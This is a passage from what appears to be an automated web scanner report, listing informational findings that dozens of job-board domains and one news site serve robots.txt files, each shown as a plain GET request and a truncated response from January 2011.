Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.7. http://www.chefcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chefcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.chefcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:47 GMT
Server: Apache
Last-Modified: Thu, 29 Apr 2010 11:47:25 GMT
ETag: "22f1ff7-1b0a-4855eb0b64d40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6922
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.8. http://www.civilengineeringcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.civilengineeringcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.civilengineeringcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:00 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:47:45 GMT
ETag: "22a830a-1a83-483c7559e2240"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.9. http://www.clevelcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clevelcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clevelcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:11 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:42:31 GMT
ETag: "2320100-1a84-483c742e6dfc0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6788
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.10. http://www.clinicalresearchcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clinicalresearchcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.clinicalresearchcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:19 GMT
Server: Apache
Last-Modified: Thu, 29 Apr 2010 11:50:12 GMT
ETag: "1d0029d-1b0a-4855ebaaa8500"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6922
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.11. http://www.compliancecrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.compliancecrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.compliancecrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:28 GMT
Server: Apache
Last-Modified: Thu, 29 Apr 2010 11:50:26 GMT
ETag: "1d081bc-1b0a-4855ebb802480"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6922
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.12. http://www.computeraideddesigncrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.computeraideddesigncrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.computeraideddesigncrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:22 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:53:49 GMT
ETag: "1c302c2-1a83-483c76b505540"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.13. http://www.constructioncrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.constructioncrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.constructioncrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:28 GMT
Server: Apache
Last-Modified: Thu, 29 Apr 2010 11:50:34 GMT
ETag: "2281662-1b0a-4855ebbfa3680"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6922
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.14. http://www.consultingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.consultingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.consultingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:28 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:29:37 GMT
ETag: "24f024d-1bf0-476fa985d5e40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.15. http://www.contractmanagementcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.contractmanagementcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.contractmanagementcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:34 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:30:00 GMT
ETag: "221a176-1bf0-476fa99bc5200"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.16. http://www.counselingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.counselingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.counselingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:47 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:30:20 GMT
ETag: "1c80182-1bf0-476fa9aed7f00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.17. http://www.cpluspluscrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cpluspluscrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.cpluspluscrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:53 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 09:05:21 GMT
ETag: "26b03ff-1bd8-476fb18283640"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.18. http://www.csmonitor.com/USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /USA/2010/1228/Julian-Assange-to-keep-WikiLeaks-afloat-with-money-from-book-deal

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.csmonitor.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Fri, 19 Feb 2010 15:46:40 GMT
Served-By:
Content-Type: text/plain
Cache-Control: max-age=17142
Expires: Sat, 22 Jan 2011 03:10:39 GMT
Date: Fri, 21 Jan 2011 22:24:57 GMT
Content-Length: 2969
Connection: close

User-agent: Mediapartners-Google*
Disallow: /includes/
Disallow: /keepalive.html

User-agent: *
Disallow: /sudoku
Disallow: /404
Disallow: /Innovation/Horizons/2009/1123/which-best-buy-black-friday-sa
...[SNIP]...

19.19. http://www.customerservicecrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customerservicecrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.customerservicecrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:06 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:30:56 GMT
ETag: "1cb8255-1bf2-476fa9d12d000"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7154
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.20. http://www.dbacrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dbacrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dbacrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:12 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:49:42 GMT
ETag: "1ba0379-1a83-483c75c976980"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.21. http://www.dentalcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dentalcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dentalcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:12 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:31:13 GMT
ETag: "24d02f0-1bf0-476fa9e163640"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.22. http://www.designingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.designingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.designingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:20 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:41:17 GMT
ETag: "22f14f6-1a84-483c73e7db940"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6788
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.23. http://www.diversitycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.diversitycrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.diversitycrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:26 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 09:06:41 GMT
ETag: "26802ff-1bd8-476fb1cecea40"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.24. http://www.dotnetcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dotnetcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dotnetcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:29 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 09:07:05 GMT
ETag: "21e80c1-1bd8-476fb1e5b2040"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.25. http://www.ecommercecrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ecommercecrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ecommercecrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:40 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 09:08:25 GMT
ETag: "1ba82e2-1bd8-476fb231fd440"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.26. http://www.edfed.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.edfed.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.edfed.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:50 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Thu, 19 Apr 2007 04:58:03 GMT
ETag: "c90329-22b8-42e700c372cc0"
Accept-Ranges: bytes
Content-Length: 8888
Connection: close
Content-Type: text/plain; charset=UTF-8

# Robots.txt file for http://www.edfed.com


User-agent: Googlebot
Sitemap: http://www.edfed.com/sitemap.xml
Sitemap: http://www.edfed.com/sitemap1.xml
Disallow: /admin
Disallow: /calculator
Disallow:
...[SNIP]...

19.27. http://www.editingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.editingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.editingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:48 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:31:31 GMT
ETag: "1ba0196-1bf0-476fa9f28dec0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.28. http://www.educationcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.educationcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.educationcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:50 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:31:50 GMT
ETag: "1d28342-1bf0-476faa04ac980"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.29. http://www.employmentauthority.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.employmentauthority.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.employmentauthority.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:56 GMT
Server: Apache
Last-Modified: Fri, 14 Mar 2008 07:05:17 GMT
ETag: "9f0a80-21a0-448604ade8540"
Accept-Ranges: bytes
Content-Length: 8608
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: Googlebot
Sitemap: http://www.employmentauthority.com/sitemap.xml
Disallow: /htdocs/contact_manag
Disallow: /htdocs/contact_test
Disallow: /htdocs/css
Disallow: /htdocs/dataupdate
Disallow
...[SNIP]...

19.30. http://www.employmentcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.employmentcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.employmentcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:25:58 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 12:17:01 GMT
ETag: "248055c-1bd8-476fdc59c4940"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.31. http://www.energycrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.energycrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.energycrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:00 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:32:11 GMT
ETag: "26c81a4-1bf0-476faa18b38c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.32. http://www.engineeringcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.engineeringcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.engineeringcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:09 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:42:06 GMT
ETag: "1d701e0-1a84-483c741696780"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6788
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.33. http://www.entrylevelcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.entrylevelcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.entrylevelcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:11 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 28 Oct 2009 08:32:32 GMT
ETag: "26882ea-1bf0-476faa2cba800"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.34. http://www.environmentalcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.environmentalcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.environmentalcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:08 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:45:52 GMT
ETag: "22a9661-1a83-483c74ee1e400"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.35. http://www.environmentalsafetyhealthcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.environmentalsafetyhealthcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.environmentalsafetyhealthcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:17 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:32:52 GMT
ETag: "1d3833d-1bf0-476faa3fcd500"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7152
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallo
...[SNIP]...

19.36. http://www.erpcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.erpcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.erpcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:17 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 29 Apr 2010 11:41:11 GMT
ETag: "270010e-1b0a-4855e9a6b83c0"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6922
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow:
...[SNIP]...

19.37. http://www.execcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.execcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.execcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:22 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 09 Apr 2010 05:40:56 GMT
ETag: "26d82d7-1a84-483c73d3d4a00"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6788
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.38. http://www.facilitiescrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facilitiescrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facilitiescrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:54 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 09 Apr 2010 05:49:26 GMT
ETag: "25a8493-1a83-483c75ba34580"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.39. http://www.financialservicescrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.financialservicescrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.financialservicescrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:55 GMT
Server: Apache
Last-Modified: Fri, 09 Apr 2010 05:44:14 GMT
ETag: "1ca0141-1a83-483c7490a8780"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 6787
Connection: close
Via: 1.1 AN-0016020122545304

       User-agent: Googlebot
User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /script
Disallow: /seo
Disallow: /soap
Disallow: /xajax_js
Disallow: /ht
...[SNIP]...

19.40. http://www.foodservicescrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foodservicescrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foodservicescrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:56 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 09:10:18 GMT
ETag: "1c982c1-1bd8-476fb29dc1280"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 7128
Connection: close
Via: 1.1 AN-0016020122545304

User-agent: Googlebot
Disallow: /_includes
Disallow: /apfeed
Disallow: /css
Disallow: /nusoap
Disallow: /rssfeed
Disallow: /script
Disallow: /seo
Disallow: /sitemap_xml
Disallow: /soap
Disallow: /xaja
...[SNIP]...

19.41. http://www.fundraisingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fundraisingcrossing.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fundraisingcrossing.com

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:25 GMT
Server: Apache
Last-Modified: Wed, 28 Oct 2009 08:33:14 GMT
ETag: "1cd0300-1bf0-476faa54c8680"
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
